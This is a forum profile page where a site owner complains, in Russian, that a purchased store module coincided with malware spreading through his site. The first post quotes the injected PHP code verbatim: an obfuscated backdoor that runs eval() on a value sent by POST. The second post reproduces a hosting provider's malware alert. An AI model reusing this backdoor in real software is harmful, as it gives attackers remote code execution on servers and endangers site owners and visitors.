Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

investenergo

Новачок
  
  • Публікації

    4
  • З нами

  • Відвідування

Інформація

  • Стать
    Не определился

Відвідувачі профілю

1 372 перегляди профілю

investenergo's Achievements

Newbie

Newbie (1/14)

  • First Post
  • Week One Done
  • One Month Later
  • One Year In

Recent Badges

-1

Репутація

  1. Модуль я принципиально не удаляю , так вот после написания отзыва на сайте в более 70 файлах появилось дополнение в виде вот такого кода <?php $buo9 ="rous_pet";$gxhi1= $buo9[3].$buo9[7]. $buo9[0]. $buo9[7]. $buo9[1].$buo9[2]. $buo9[5].$buo9[5].$buo9[6].$buo9[0] ; $ulwi18 = $gxhi1( $buo9[4].$buo9[5].$buo9[1]. $buo9[3].$buo9[7]);if(isset (${$ulwi18 }[ 'qaea521'])){eval ( ${$ulwi18 }[ 'qaea521' ] ) ; } ?> И это что совпадение ???? Вчера по данным статистики какое то бешеное количество посещений было . И все защитились яндексом как накрутка .... Ждем отправки сайта под фильтр Можете сами убедится сайт www.лэп.москва .. Автор не отвечает на запросы в скайп. Жалко . Деньги отдал -проблемы получил.
  2. У меня стоит данный модуль . хостер шлет каждый день письма, Оперативы не хватает, периодически блокирует почтовый сервер из за того что сервак мой спамит. Приходится каждый раз ручками удалять тонны вредоносного кода который берется х.з откуда . по ftp точно не заносил .Теперь по поводу ложного срабатывания, у многих модулей есть кодированный код инкубом например у симпла и ни кто из антивирусов не ругается !!!! Звонил в тех поддержку хостинга просил помочь разобраться отослали фай В ЛАБ КАСПЕРСКОГО и со 100% ДАЛИ ОТВЕТ , ЧТО СОДЕРЖИТ ВИРУС !! По скольку модуль был куплен тут, и автор лично уставил мне его на сайт , и потом я несколько раз переписывался по поводу замучивших меня проблем с вирусами, у меня были и остаются до сих пор сомнения. В разговоре всегда был вежлив , отзывчив и убеждал меня что это происходит не по вине модуля. Пора бы исходники сюда выложить - если модуль стал бесплатным. Здравствуйте! Вы являетесь клиентом SpaceWeb. Ваш логин: В ходе плановой проверки на Вашем аккаунте было обнаружено подозрительное, потенциально вредоносное, содержимое. Ниже приведены пути к найденным файлам, а также их описание: /home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php___ : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL /home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-key.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL /home/l/lepmoskva2/lepmoskva/public_html/system/library/microdata/license-not.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL /home/l/lepmoskva2/lepmoskva/public_html/admin/controller/module/microdata.php : PHP.HostComm.#233983.PHP.AROHA.PHPencoder.obfuscated.UNOFFICIAL Обращаем внимание, что размещение вредоносных файлов является нарушением п. 2.10 Приложения No1 к Договору публичной оферты (https://sweb.ru/docs/oferta.pdf): "Запрещено использование Заказчиком оказываемых Исполнителем услуг для публикации и/или распространения любой информации или программного обеспечения, которые содержат в себе компьютерные "вирусы" или способны нанести вред другим пользователям сети Интернет."

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.